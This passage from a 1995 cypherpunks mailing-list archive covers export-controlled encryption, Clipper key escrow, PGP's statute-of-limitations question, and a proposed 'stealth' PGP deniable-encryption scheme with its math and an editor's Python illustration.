================= ================= If you have gopher, you can browse the CAF archive with the command gopher gopher.eff.org These document(s) are also available by anonymous ftp (the preferred method) and by email. To get the file(s) via ftp, do an anonymous ftp to ftp.eff.org (192.77.172.4), and then: cd /pub/CAF/law get ecpa.1986.godwin cd /pub/CAF/law get ferpa.text cd /pub/CAF/faq get email.policies cd /pub/CAF/library get confidentiality.1.ala cd /pub/CAF/library get computer.draft.ala cd /pub/CAF/statements get bill-of-rights.aahe cd /pub/CAF/statements get caf-statement cd /pub/CAF/statements get caf-statement.critique cd /pub/CAF/academic get student.freedoms.aaup cd /pub/CAF/academic get speech-codes.aaup cd /pub/CAF/law get uwm-post-v-u-of-wisconsin cd /pub/CAF/law get gillard-v-schmidt cd /pub/CAF/law get email.gov-employee cd /pub/CAF/law get mass-student-searches cd /pub/CAF/law get constraints.constitutional cd /pub/CAF/law get ecpa.umich cd /pub/CAF/law get privacy.email cd /pub/CAF/law get privacy.workplace cd /pub/CAF/law get email.bib To get the file(s) by email, send email to ftpmail at decwrl.dec.com Include the line(s): connect ftp.eff.org cd /pub/CAF/law get ecpa.1986.godwin cd /pub/CAF/law get ferpa.text cd /pub/CAF/faq get email.policies cd /pub/CAF/library get confidentiality.1.ala cd /pub/CAF/library get computer.draft.ala cd /pub/CAF/statements get bill-of-rights.aahe cd /pub/CAF/statements get caf-statement cd /pub/CAF/statements get caf-statement.critique cd /pub/CAF/academic get student.freedoms.aaup cd /pub/CAF/academic get speech-codes.aaup cd /pub/CAF/law get uwm-post-v-u-of-wisconsin cd /pub/CAF/law get gillard-v-schmidt cd /pub/CAF/law get email.gov-employee cd /pub/CAF/law get mass-student-searches cd /pub/CAF/law get constraints.constitutional cd /pub/CAF/law get ecpa.umich cd /pub/CAF/law get privacy.email cd /pub/CAF/law get privacy.workplace cd /pub/CAF/law get email.bib -- Carl Kadie -- I do not represent EFF or my 
employer; this is just me.
=Email: kadie at eff.org, kadie at cs.uiuc.edu =
=URL: , =

From patrick at Verity.COM Tue Sep 12 08:24:15 1995
From: patrick at Verity.COM (Patrick Horgan)
Date: Tue, 12 Sep 95 08:24:15 PDT
Subject: PGP in UK - snooped as unSTEALTHed?
Message-ID: <9509121520.AA12778@cantina.verity.com>

> > MICROSOFT VERSUS BORLAND FOR COMPILING/ASSEMBLING PGP

I recently got Symantec C++ 7.0 for less than either Microsoft or Borland were selling their packages for. It's a nicer development environment than either as well. It also supports DOS/Windows3.x/NT/Chicago. (I don't remember if it supports OS2.)

Patrick
 _______________________________________________________________________
/ These opinions are mine, and not Verity's (except by coincidence;). \
| (\ |
| Patrick J. Horgan Verity Inc. \\ Have |
| patrick at verity.com 1550 Plymouth Street \\ _ Sword |
| Phone : (415)960-7600 Mountain View \\/ Will |
| FAX : (415)960-7750 California 94303 _/\\ Travel |
\___________________________________________________________\)__________/

From danisch at ira.uka.de Tue Sep 12 08:27:12 1995
From: danisch at ira.uka.de (Hadmut Danisch)
Date: Tue, 12 Sep 95 08:27:12 PDT
Subject: Elliptic Curve Public Key Crypto available
Message-ID: <9509121500.AA03172@elysion.iaks.ira.uka.de>

Available anywhere outside the escrowed country ?

From weld at l0pht.com Tue Sep 12 08:34:30 1995
From: weld at l0pht.com (Weld Pond)
Date: Tue, 12 Sep 95 08:34:30 PDT
Subject: Netscape to patch shareware version
Message-ID:

This is from the Sept 11, 1995 Inter at ctive Week:

Netscape Communications Corp.'s freely distributed browser is getting commercial-grade encryption, making it safe to use in the U.S. The change comes two weeks after Inter at ctive Week disclosed that the free version contained relatively weak encryption that had been cracked by a European user. [...] Meanwhile, in an as yet unannounced move, the company said it would place its commercial browser online for free downloading.
That move apparently comes in direct response to an Inter at ctive Week article that highlighted the fact that all shareware versions of the browser contain the so-called 40-bit key encryption software which was recently proven insecure. The commercial version, sold only in the U.S. contains an unbreakable 128-bit encryption scheme. Netscape said it received word last week that the State Department had cleared that version for release on the Net, but only within the U.S., owing to current export laws banning the export of encryption schemes stronger than 40 bits. The company could provide no details by press time on how it would ensure that the 128-bit version wouldn't leak beyond U.S. borders.

[end excerpts]

I love how Inter at ctive Week pats themselves on the back for making people aware of the problem. I guess the cypherpunk media hacking is working. Doing things behind the scenes and making the press think they are the internet users' salvation looks like a good tactic. The cypherpunks forced a situation where Net users now have better encryption available to them. I'd say this is a big win.

Weld Pond - weld at l0pht.com - http://www.l0pht.com/~weld
L 0 p h t H e a v y I n d u s t r i e s
Technical archives for the people - Bio/Electro/Crypto/Radio

From adwestro at ouray.cudenver.edu Tue Sep 12 08:59:10 1995
From: adwestro at ouray.cudenver.edu (Alan Westrope)
Date: Tue, 12 Sep 95 08:59:10 PDT
Subject: Phil Zimmermann/Amnesty International?
In-Reply-To: <199509021658.MAA29224@frankenstein.piermont.com>
Message-ID: <6aaVwkkAseQS084yn@ouray.cudenver.edu>

-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 02 Sep 1995, "Perry E. Metzger" wrote:
> Alan Westrope writes:
[replying to M. Froomkin about statute of limitations for prz]
> > June '96. Zimmermann and Dubois appeared on a local talk radio show
> > recently; a friend happened to catch the program, taped it, and played
> > excerpts at a Cypherpunks meeting. This date was mentioned by Phil Dubois.
> That's not possible. The offense in question took place on or before > September 8, 1992, and the statute of limitations is, to my knowledge, > three years. Even if it were four years, it would have to be September > 8th of that year. Branko Lankester announced availability of PGP 2.0 > on Mon, 7 Sep 1992 at about 20:22 GMT, so since the allegation is that > he exported PGP Version 1.0 to the team that developed PGP 2.0 > overseas, any export that Phil performed would have of necessity to > have taken place before then. Perry's response and Brian Davis' remarks about prosecutorial "creativity" prompted me to ask Phil Dubois for clarification. (I told him I would probably pass his reply along to the list, so I'm not violating email confidentiality here.) Here's the relevant snippet: ======================================================================== I believe that the statute expires in June of '96, because there is a five-year statute on the export-violation allegation and because PGP was released in June of '91, and whoever exported it did so shortly after the release. It is true, however, that prosecutors have been very creative in extending the statute when they've felt the need to do so. We can only hope that DOJ will not feel the need in this case. ======================================================================== I also feel Phil will be largely off the hook by June. It would be damn silly to prolong the matter, especially since the complete source code has been published internationally in OCR format now. Also, I expect the Feds would rather focus their "creative" energies on the Bernstein/EFF export issue. But who knows what anti-crime hysteria might be whipped up in an election year, or who it might become handy to demonize, etc. 
Alan Westrope __________/|-, (_) \|-'
2.6.2 public key: finger / servers
PGP 0xB8359639: D6 89 74 03 77 C8 2D 43 7C CA 6D 57 29 25 69 23

From ylo at cs.hut.fi Tue Sep 12 09:17:52 1995
From: ylo at cs.hut.fi (Tatu Ylonen)
Date: Tue, 12 Sep 95 09:17:52 PDT
Subject: Elliptic Curve Public Key Crypto available
In-Reply-To: <9509121500.AA03172@elysion.iaks.ira.uka.de>
Message-ID: <199509121617.TAA06025@shadows.cs.hut.fi>

> Available anywhere outside the escrowed country ?

See http://www.cs.hut.fi/crypto/software.html#eliptic

It was in Italy (ftp.dsi.unimi.it) earlier today...

Tatu

From talon57 at well.com Tue Sep 12 09:20:43 1995
From: talon57 at well.com (Brian D Williams)
Date: Tue, 12 Sep 95 09:20:43 PDT
Subject: Elliptic Curve Public Key Crypto
Message-ID: <199509121620.JAA08381@well.com>

Mike Rosing writes:
>in the cypherpunks ftp site /pub/cypherpunks/ciphers are 2 ascii
>files. One contains code and the other contains documentation:
>eliptic.src and elliptic.doc. The code portion is a cat'ed block
>of files: headers, C sources and a set of prime numbers. The
>documentation attempts to explain the math, but it does help if
>you already know number theory. It hopefully isn't necessary.

Thanks Mike for all your effort!!

Now could someone remind me where the Cypherpunks FTP site is? Please?

Brian D Williams
Cypherpatriot

" Zen? Well it beats sitting around on your ass all day doing nothing!
"

From andrew_loewenstern at il.us.swissbank.com Tue Sep 12 09:29:17 1995
From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern)
Date: Tue, 12 Sep 95 09:29:17 PDT
Subject: Digital Fingerprinting
Message-ID: <9509121627.AA00538@ch1d157nwk>

> I said I'd mention "state secrets" again. The usual example for
> making subtle modifications to documents to see who leaked it is
> the intelligence community, which gave us the term "barium" (because
> the changes look like barium in an x-ray diagnostic).

Such technology would be very useful in business, especially the high-tech industry. Think of how many non-disclosure agreements are signed every day relating to new products developed for the software industry alone. Many companies are very paranoid and already 'fingerprint' information by using unique code-names for projects, for instance. i.e. the spec sheet on their new GAK crypto product they give to Alice may be code-named 'project foobar' but the one they give to Bob may be code-named 'project burris'... Then, when the information leaks out they check which person they gave the document with that code-name and they know who to sue (or at least not give any more trade-secrets to). It's very simplistic but it has been known to work in the past. Most of the real technology for doing this is much better, of course... However, what stops you from printing out a fingerprinted document and scanning it back in, for instance?

andrew

From klp at gold.tc.umn.edu Tue Sep 12 09:48:44 1995
From: klp at gold.tc.umn.edu (Kevin L Prigge)
Date: Tue, 12 Sep 95 09:48:44 PDT
Subject: Elliptic Curve Public Key Crypto
In-Reply-To: <199509121620.JAA08381@well.com>
Message-ID: <3055b9ac3c42002@noc.cis.umn.edu>

A little birdie told me that Brian D Williams said:
>
> Now could someone remind me where the Cypherpunks FTP site is?
> ftp://ftp.csua.berkeley.edu/pub/cypherpunks -- Kevin Prigge | Holes in whats left of my reason, CIS Consultant | holes in the knees of my blues, Computer & Information Services | odds against me been increasin' email: klp at cis.umn.edu | but I'll pull through... From bal at martigny.ai.mit.edu Tue Sep 12 09:57:03 1995 From: bal at martigny.ai.mit.edu (Brian A. LaMacchia) Date: Tue, 12 Sep 95 09:57:03 PDT Subject: Famous Zen koan: what is the sound of two shoes dropping? Message-ID: <9509121656.AA18132@toad.com> You may recall that Dorothy Denning had a pro-Clipper article in _Technology Review_ back in July. The October issue of TR contains not only some critical letters to the editor, but also a reply from Denning. How things have changed over the last 18 months... --bal ------- Start of forwarded message ------- Date: Tue, 12 Sep 95 12:23:00 -0400 Return-Path: From: Hal Abelson To: bal at martigny.ai.mit.edu Subject: Famous Zen koan: what is the sound of two shoes dropping? What is the sound of two shoes dropping? **Part 1: March 10, 1994 (From the debate between Dorothy Denning and John Perry Barlow, moderated by Philip Elmer-DeWitt) Barlow: EFF is not asking the Government to drop Clipper, though we would vastly prefer they did. We're merely asking that no steps be taken to require it either by law or practice...as, for example, would be the case if you had to use a Clipper chip to file your tax return. DeWitt: Dr. Denning, do you think this is the "first step in a process to outlaw crypto"? Denning: No I do not. ***Part 2: October 10, 1995 (From Dorothy Denning's response to letters to the editor in _Technology Review_) Denning: But critics make an important point when they argue that criminals will not use Clipper or other forms of key escrow encryption. As long as there are no laws in the United States controlling the sale and distribution of encryption products, the U.S. market will be flooded with products that have no provisions for government access. 
This eventual threat to public safety and social order could be avoided by establishing a licensing program for encryption products that reasonably satisfy the government's decryption requirements and do not interoperate with unlicensed systems. While the manufacture and distribution of unlicensed encryption products would be illegal, no particular system would be mandatory and any licensed product could be used without restriction. Although such a licensing program would not prevent criminals from using unlicensed products, their availability would be limited to underground channels.

------- End of forwarded message -------

P.S. Denning's TR article is available at: http://web.mit.edu/afs/athena/org/t/techreview/www/articles/july95/Denning.html

From Andrew.Spring at ping.be Tue Sep 12 10:02:58 1995
From: Andrew.Spring at ping.be (Andrew Spring)
Date: Tue, 12 Sep 95 10:02:58 PDT
Subject: GAK/weak crypto rationale?
Message-ID:

>intercepts requested and authorized in the past year. As I recall, the
>number was quite small - around 12K [?]. Someone had found this out
>through an FOIA request, perhaps, (my recollection of it is poor). It was

I think it's about 1200.

>not a large number, anyway. I must conclude that the actual number of
>intercepts is much, much larger than they are saying, and that they must
>be getting what they perceive to be good intel from all this snooping.
>

A more cautious conclusion would be that the importance (to the LEA's) of the busts made with crypto is much larger than the numbers suggest. You could interpret that a lot of ways: I suspect that high-profile career-enhancing cases are highly dependent on wiretaps.
From andrew_loewenstern at il.us.swissbank.com Tue Sep 12 10:03:01 1995
From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern)
Date: Tue, 12 Sep 95 10:03:01 PDT
Subject: Elliptic Curve Public Key Crypto available
Message-ID: <9509121658.AA00550@ch1d157nwk>

> Previous to the availability of 100 MHz processors this method of
> public key crypto was ridiculously slow. The only versions were
> laboratory curiosities implemented in ASIC hardware. Code, if it
> exists, is not in the public domain.

What about NeXT's Fast Elliptic Encryption (FEE)? Their research guy, Richard Crandall, came up with major speedups to elliptic curve encryption. In fact, there was a simple cryptosystem that shipped as a demo with NeXTSTEP 2.0. What was most interesting about this system was that it didn't store any keys anywhere; your public/private key pair was generated _on the fly_ from your passphrase every time you encrypted or decrypted....on a 25mhz 68040 too... and it was fast! It wasn't that great of an implementation (you _really_ need a lot of bits of entropy in that passphrase, and you can't change your passphrase without changing your PK), but it shows how fast NeXT's speedups are. And this was in 1990... I'm not sure if the speedups are patented, but you could try a literature search. If it really is fast then it could mean good things for servers that need to do a lot of encryption/decryption for interaction with clients.

andrew

From ian at bvsd.k12.co.us Tue Sep 12 10:27:17 1995
From: ian at bvsd.k12.co.us (Ian S. Nelson)
Date: Tue, 12 Sep 95 10:27:17 PDT
Subject: GAK/weak crypto rationale?
In-Reply-To:
Message-ID: <199509121726.LAA27609@bvsd.k12.co.us>

>
> >intercepts requested and authorized in the past year. As I recall, the
> >number was quite small - around 12K [?]. Someone had found this out
> >through an FOIA request, perhaps, (my recollection of it is poor). It was
>
> I think it's about 1200.
>
> >not a large number, anyway.
> >I must conclude that the actual number of
> >intercepts is much, much larger than they are saying, and that they must
> >be getting what they perceive to be good intel from all this snooping.
> >
>
> A more cautious conclusion would be that the importance (to the
> LEA's) of the busts made with crypto is much larger than the numbers
> suggest. You could interpret that a lot of ways: I suspect that
> high-profile career-enhancing cases are highly dependent on wiretaps.

It could also be argued that the number of busts and wire taps will go up dramatically as more and more people begin to use communications in more integrated ways with their life and career. It is kind of a fallacy, but communications does seem to be a rapidly growing market. I imagine the folks who push for that sort of crap are thinking of the future, else we'd already have it.

From aba at dcs.exeter.ac.uk Tue Sep 12 10:33:50 1995
From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk)
Date: Tue, 12 Sep 95 10:33:50 PDT
Subject: Returned mail: User unknown
In-Reply-To: <199509121728.SAA16313@hermes>
Message-ID: <26561.9509121731@exe.dcs.exeter.ac.uk>

[whoops misspelled cpunks on cc line 1st time, sorry for 2 copies]

Perry Metzger wrote:
> Gary Jeffers writes:
> > Well, I just used MIT's PGP 2.6.2 with 3 different users' public
> > keys to encrypt 3 different files. In all 3 files, the first 3
> > characters were the same (an umlauted A, then an i with an up arrow
> > over it, and then a heart). This beginning 3 character string is
> > apparently the infamous PGP RSA signature. The signature that says
> > to spooks' programmed encryption sniffers - "HEY! I'M PGP - GIVE ME
> > A LOOK!."
>
> As if they couldn't figure it out anyway. It isn't an "RSA signature"
> by the way. Read format.doc sometime.
Yeah, that's what stealth does, removes the boiler plate stuff saying, various things, such as pgp version number, rsa encrypted message, conventional idea block, and as Perry says, it's all in pgformat.doc in the PGP docs directory.

> > When are the PGP designers and coders going to get serious and
> > develop STEALTH PGP inside PGP itself!?
>
> Never, I hope. It would dramatically lower the utility of the
> system. Can you imagine how disgusting it would be to try decrypting
> something if you have a dozen keys outstanding? Not to mention how
> hard it would be to deal with figuring out that you should even try to
> decrypt things in the first place.

I reckon it would be a very nice utility, built into pgp as an *option*, some countries it isn't legal to use PGP, and it hasn't been ruled out that the US may not be the next to join the list, all this GAK stuff, son of Clipper, it is a distinct possibility that the law enforcement lot might outlaw other crypto with mandatory GAK. Then stealth features for PGP become important for incorporating into stego, of course you can argue that well stealth should be part of the stego app then. It shouldn't be a problem unless it was enforced, as an option I see no problem with it, and lots of possible future advantages even.

I'm trying to work on stealth2.1, modifying Henry Hastur's stealth util to add Hal Finney's algorithm for improving the stealthiness (it's not enough to just strip the headers as stealth1.x does, the fact that the RSA encrypted header is always < N, the rsa modulus gives the game away with a few messages to analyse for statistical purposes, ie if you see a lot messages < N, where N is by definition not an even power of 2, and possibly even N is known, or suspected from keyservers).
I've been delaying releasing it because I was worrying about ran no generators being good enough, but I think I might have convinced myself that it is not even necessary to use ran no generators, I'd appreciate it if some folks with a bit of crypto expertise could cast their eye over the description below. > > So what, -that "only a few companies" will be discovered to be using PGP > > through the RSA signature!? Those few companies are the seeds for the > > vast numbers of companies that would follow them in using PGP over the > > Internet. The RSA signature is the flag that allows the spooks to easily > > net the bold first companies. The RSA signature is greatly impeding the > > spread of PGP use over the Internet. PGP MUST BE STEALTHED!! > > It isn't an RSA signature. Its a bunch of magic numbers. > > Look, get real already. If someone sees a bunch of random numbers in > mail sent by me, its going to be pretty obvious what the hell is > inside anyway. Yeah, but you wouldn't do it that way. I reckon this is what you'd do: % pgp -es duress % pgp -es msg % stealth < msg.pgp > msg.stl % cat msg.stl >> duress.pgp % pgp +makerandom=1234 noise % cat noise >> duress.pgp % pgp -a duress.pgp % mail someone < duress.asc The pgp +makerandom= is an undocumented feature of pgp > 2.6 (not sure exactly when it got added, Colin Plumb pointed it out when I asked him about ran nos for stealth). So what this means is that you are using PGP it's self to hide a stegoed message. 
This would be good for the guy from FACTnet (forgotten his name) who just
got hit by the CoS. He could hold out for a while, then give up his key,
the duress message would appear, and the real message would be explained
by having a script to do this on his HD, and having long since burned the
disk with a script to do the above on it:

% pgp -es msg
% pgp +makerandom=4567 noise
% cat noise >> msg.pgp
% pgp -a msg.pgp
% mail someone < msg.asc

ie the idea is that you pad your message to a fixed size for the express
purpose of hampering traffic analysis (of the type of my, Alice did have a
lot to say to Bob that day). It would be even better cover if the thing had
gotten sent through a remailer, as this kind of thing is expected of type I
remailer traffic (before mixmaster which does the packetizing for you).

So the duress message really looks like this:

+---------+---------------------------+--------------------+--------+
| pgp hdr | IDEA encrypted duress msg | stealthed real msg | noise  |
+---------+---------------------------+--------------------+--------+

the IDEA block has a length field, but you can increase the length without
damage to include the following stealthed stuff, as the underlying stuff
which is IDEA encrypted will know its length on decryption, and the
following junk will just be discarded.

So, Alice and her secret key ring (encrypted) gets nabbed by Charlie
(CoS?), and coerced into divulging her passphrase. And if and when it is
noticed that the message was longer than it ought to be (CoS that smart?
substitute the NSA and they'd notice for sure), Alice explains away the
junk on the end by pointing them to the fact that all of her messages were
exactly (say) 16k long, and that she was using the noise only script, and
that the message really is this:

+---------+---------------------------+-----------------------------+
| pgp hdr | IDEA encrypted duress msg |            noise            |
+---------+---------------------------+-----------------------------+

Now we come to arguments about why you might want this built-in to PGP.
Well it provides plausible deniability as you have no extra software which
might look incriminating unless you managed to dispose of it first, if it
comes as stock. Also the 2nd reason for built-in, at least for stealth, is
if it needs a good random number source, but as I said, I'm not sure it
needs a random no generator.

So comments please, this has been around a few times already, but here's
the algorithm for manipulating x which is the RSA encrypted component of
the header of an RSA+IDEA encrypted PGP message:

(this is a description of my implementation of Hal's algorithm as
described on his www page: http://www.portal.com/~hfinney/):

consider random no x, RSA modulus N

    1 < x < N

(that used to say 0 <= x < N, but 0, and 1 being RSA fixed points, 0, 1,
and N won't be generated by PGP presumably? I think this shouldn't matter
as the keyspace of N is so large that the probability of a 0 or a 1
specifically is nothing to worry about I think.)

Hal's algorithm was to convert x to being in the range:

    0 <= x' < lim

where lim is the next power of 2 above N * 2^surety, and surety is 64. 64
seems big enough?

The recover operation is:

    x = x' mod N

and the create operation is:

1) scale = int( (lim-1) / N ) + 1
2) scale2 = 2^int( log2( scale ) + 1)
   ie scale2 = next power of two over scale
3) r = MD5( 0, x )
   ie MD5 digest of x, as x is an RSA encrypted random session key, misc
   other info, and more random padding to bring up to be close to N in
   size.

   It strikes me that we already have a random number, and that provided
   MD5 can not be inverted (which it is not possible, as it is
   compressing, and loses info, and the brute force to find which of all
   the possible y's (0 < y < N) MD5 digests come out to be x. I would
   have thought it likely that this would be evenly distributed, and that
   the cost would be enormous?

4) r = MD5( r, rand() )
   it will fail some of the time, so in this case repeat with another
   random number. I stirred it in first but perhaps you would only do it
   if it failed. Or perhaps it is enough to MD5( r, r ) ie stir r into
   itself to generate another ran no? So long as there are no rare
   cycles? Presumably either impossible or infinitesimally small
   probability.
5) r = r mod scale2
6) if (r > scale) goto 4)

   4), 5) & 6) are designed to generate an evenly distributed random
   number in the range: 0 <= r <= scale

7) x' = N * r + x
8) if (x' > lim) goto 4)

an example, with small numbers, and surety set to 8, x = 7, and
manufacturing the ran nos manually:

   lim = 2^( int( log2(N) + 1 ) + surety ) = 2^( 4 + 8 ) = 4096

1) scale = int( 4096 / 13 ) + 1 = 316
2) scale2 = 2^( int( log2( scale ) ) +1 ) = 2^(8 + 1) = 512
3) say MD5( x ) = 0x00000000000000000000000000001234
4) say MD5( x, rand ) = 0x00000000000000000000000000001235 = 4661 (base 10)
5) r = 4661 mod scale2 = 4661 % 512 = 53
6) if ( 53 > 315 ) - it's not
7) x' = N * r + x = 13 * 53 + 7 = 696
8) if (696 > 4096) - it's not

so x' = 696

reversing: x = x' mod N = 696 mod 13 = 7

when 6) is true, ie r > scale, which will happen half the time on avg with
the first ran no, and so on like a coin flip, the chances of many coins
flipping the wrong way diminishes rapidly with number of flips.

when 8) is true, ie x' > lim: x' can only be > than lim when x = N - 1,
and given that x = N - 1, the probability is less of x being in
N * scale <= x < lim, but this will only occur with probability:

       1          1
    --------  <  -----
    2^surety     scale

I think.
So you'd have to collect one mess of messages to even catch one sample,
let alone enough messages to have a statistical proof of steganography
being present.

Pls check the maths a bit, the above describes the software implementation
of Hal's algorithm which he has on-line, on his page:
http://www.portal.com/~hfinney/

But the main question I'd like to get verification on is if it is safe to
use the MD5 of the RSA encrypted message to perform the operation. I'm
essentially doing:

    x' = N * f(MD5(x)) + x

where f(y) is a function which converts from range 0 <= y < 2^128 to a
range 0 <= f(y) < scale.

Is that safe? x is random, and will be different even for a repeat
encryption of the same file, as PGP is using a random IDEA session key. So
are there any brute force attacks on that which would be cheaper than
attacking 128 bit IDEA? PGP's random number generator also makes extensive
use of MD5, so I'm taking the use of MD5 as secure as a given.

If it is thought to be dangerous for some reason (it is after all some
kind of signature on itself), presume that you know N, and x' but not x;
the question is can the equation be brute force reversed in a less than
128 bit brute force attack. I'm neglecting to consider the rand() calls,
which I'm not expecting to add security, but are just a mechanism to stir
the value with to get more random nos, as occasionally the algorithm needs
more than one, if the first fails, etc.

If people reckon it's insecure, then it would be ideal to include the
stealth functionality into PGP, so that integral use of PGP's ran no
routines can be made. I was previously using an MD5 digest of PGP's
randseed.bin for this, but you can't stir it (well you could but that
would be considered a security risk, diddling with PGP's files), and not
stirring means you have no improvement over the above, in the event that
your system is captured with the known plaintext. If you stirred it there
would be no proof of that being the message in the file.
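[Editor's added example, not part of Adam's post and not his stealth2 code nor Hal Finney's implementation: the create and recover operations above, steps 1 through 8, written out in Python with MD5 from hashlib. The function names, the injectable `rand` argument (os.urandom by default, so the stirring can be driven deterministically in a test) and the `fraction_below_modulus` check are this example's own inventions; step 8 rejects x' >= lim rather than x' > lim, since the stated target range is 0 <= x' < lim.]

```python
import hashlib
import os

MD5_LEN = 16  # bytes in an MD5 digest


def stealth_params(N, surety=64):
    """Constants of the range expansion as laid out in the post.

    lim    = next power of two above N, with `surety` extra bits
    scale  = int((lim - 1) / N) + 1
    scale2 = next power of two over scale
    """
    lim = 1 << (N.bit_length() + surety)
    scale = (lim - 1) // N + 1
    scale2 = 1 << scale.bit_length()
    return lim, scale, scale2


def _md5(*parts):
    h = hashlib.md5()
    for p in parts:
        h.update(p)
    return h.digest()


def stealth_create(x, N, surety=64, rand=os.urandom):
    """Map the RSA-encrypted block x (1 < x < N) to x' with 0 <= x' < lim
    and x' == x (mod N), so x' looks like a uniform random bit string.

    `rand` is the stirring source of step 4 (hypothetical parameter,
    not from the post): os.urandom by default, replaceable for testing.
    """
    if not 1 < x < N:
        raise ValueError("x must satisfy 1 < x < N")
    lim, scale, scale2 = stealth_params(N, surety)
    xbytes = x.to_bytes((N.bit_length() + 7) // 8, "big")
    # step 3: seed r from the ciphertext block itself, MD5(0, x)
    r = _md5(b"\x00", xbytes)
    while True:
        # step 4: stir in another random number
        r = _md5(r, rand(MD5_LEN))
        # step 5: reduce into [0, scale2)
        cand = int.from_bytes(r, "big") % scale2
        # step 6: reject so the surviving r is uniform on 0 <= r <= scale
        if cand > scale:
            continue
        # step 7
        xp = N * cand + x
        # step 8: keep the result inside the target range 0 <= x' < lim
        if xp >= lim:
            continue
        return xp


def stealth_recover(xp, N):
    """The recover operation: x = x' mod N."""
    return xp % N


def fraction_below_modulus(values, N):
    """The statistic the post says gives the game away: PGP's raw RSA
    block is always < N, so a batch of them all satisfy v < N, while the
    expanded values almost never do."""
    return sum(1 for v in values if v < N) / len(values)


if __name__ == "__main__":
    # the post's small worked case: N = 13, x = 7, surety = 8
    N, x = 13, 7
    xp = stealth_create(x, N, surety=8)
    print("x' =", xp, "recovers to", stealth_recover(xp, N))
    raw = list(range(2, N))  # every raw block PGP could produce for N = 13
    hidden = [stealth_create(v, N, surety=8) for v in raw]
    print("fraction < N: raw", fraction_below_modulus(raw, N),
          "stealthed", fraction_below_modulus(hidden, N))
```

Run stand-alone it reproduces the post's small case (N = 13, x = 7, surety = 8) with real stirring instead of hand-picked digests, so x' will differ from 696 but always recovers to 7; the last line puts the post's traffic-analysis point in numbers, with the raw blocks sitting entirely below N while the expanded ones spread over the whole of [0, lim).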
Even unstirred, if the N * f(MD5(x)) + x is no good, the inclusion of a
digest of the randseed.bin would be a big improvement.

It seems rather messy to have all of the keyboard sampling stuff, for PGP
keys duplicated for this. Hope the x' = N * f(MD5(x)) + x construct is
secure as this will avoid the issue.

Adam

From trei at process.com Tue Sep 12 10:45:36 1995
From: trei at process.com (Peter Trei)
Date: Tue, 12 Sep 95 10:45:36 PDT
Subject: Digital Fingerprinting
Message-ID: <9509121745.AA19687@toad.com>

> Finding the mail mixed in there is evidence that supports the "charge"
> but surely can be rebutted. When I was practicing in a small town c.
> 1984, people would be summoned (sent a paper telling them to show up) to
> court for illegal dumping if their mail was found with other trash, old
> refrigerators, etc., in a creek somewhere. Those charged could always
> put on proof that Billy Bob's garbage service picked up their trash ...
> The sentence was almost always to go and pick up some multiple of the
> garbage found and take it to the landfill.

This was Stockbridge, in MA, right :-?

That's what we did, and drove back to the church, had a thanksgiving
dinner that couldn't be beat, went to sleep and didn't get up until the
next morning, when we got a phone call from officer Obie. Said "Kid, we
found your name on an envelope at the bottom of a half a ton of garbage,
and just wanted to know if you had any information bout it". I said "Yes
Sir Officer Obie, I cannot tell a lie, I put that envelope under that
garbage." (c) Arlo Guthrie

Peter Trei
Senior Software Engineer
Purveyor Development Team
Process Software Corporation
http://www.process.com
trei at process.com

From an215712 at anon.penet.fi Tue Sep 12 10:50:29 1995
From: an215712 at anon.penet.fi (an215712 at anon.penet.fi)
Date: Tue, 12 Sep 95 10:50:29 PDT
Subject: Whitehouse "dissident" web site monitoring?
Message-ID: <9509121717.AA03226@anon.penet.fi> - ---------------------------------------------------------- WHITE HOUSE MONITORING OF DISSIDENTS ON THE INTERNET The National Security Agency presumably can monitor subversive communication on the Internet without leaving any trace by "sniffing packets" at traffic nodes. For purely political purposes, however, the White House may be forced to do the monitoring in-house, which means that they leave traces everywhere they go. With just a superficial search for such traces, The Washington Weekly has uncovered intensive monitoring of "dissident" Internet sites by the White House. It turns out that computers from inside the White House have kept pretty good tabs on information available on Whitewater, Vince Foster, and Mena at a few key repositories on the World- Wide Web, a subset of the Internet. Just three such sites: "The Washington Weekly, "The Whitewater Scandal Home Page" and "Whitewater & Vince Foster," were accessed 128 times by four computers from the Executive Office of the President between August 28 and August 31. If the White House is showing a similar interest in other sites on the World Wide Web, that would amount to a monitoring operation of considerable magnitude. Tim Brady of the Yahoo! World-Wide Web index says that his company alone has indexed approximately 725 political sites. That monitoring effort would be nothing, however, compared to the effort required to follow all anti- Clinton discussion on the Usenet, another subset of the Internet. The White House did not respond to an inquiry (attached below) asking for an explanation and asking whether this constituted "casual browsing." Interestingly, the week after the White House snooping of files, which included a series of articles by J. 
Orlin Grabbe on Vince Foster's ties to the NSA, the following little piece appeared in Newsweek Magazine: "Conspiracy theorists perked up when Deborah Gorham told Senate Whitewater investigators in June that her boss, the late deputy White House counsel Vince Foster, asked her to put two secret notebooks from the National Security Agency in a White House safe. The suggestion that Foster dealt with the NSA sparked feverish speculation on the Internet that he was involved in espionage. The reality appears more prosaic. The White House won't give details, but sources say Foster's files dealt with legal questions about national emergencies...." Does the White House follow anti-Clinton discussion on Usenet newsgroups just as closely? The White House posts press releases to Usenet in collaboration with the Artificial Intelligence Lab at Massachusetts Institute of Technology. But MIT System Administrator Bruce Walton says that the White House does not use the same server for reading netnews. It would be difficult - although not impossible - to find the server that the White House uses for reading or receiving netnews and check for traces on that server. Readers may be tempted to post a threat to the President on a newsgroup just to see if they get a visit from the Secret Service the next day. That experiment is not advisable. It is a criminal offense. But Usenet just might be a faster conduit for getting the attention of the administration than the email address that the White House has published for the president. Attachment: THE WASHINGTON WEEKLY _________________________________________________________________ August 31, 1995 Virginia M. Terzano White House Office of the Press Secretary The White House Dear Ms. Terzano: It has come to my attention that several dissident sites on the World Wide Web have been visited by White House computers this week. Apparently, all information regarding Whitewater, Foster, and Mena has been transferred to White House computers. 
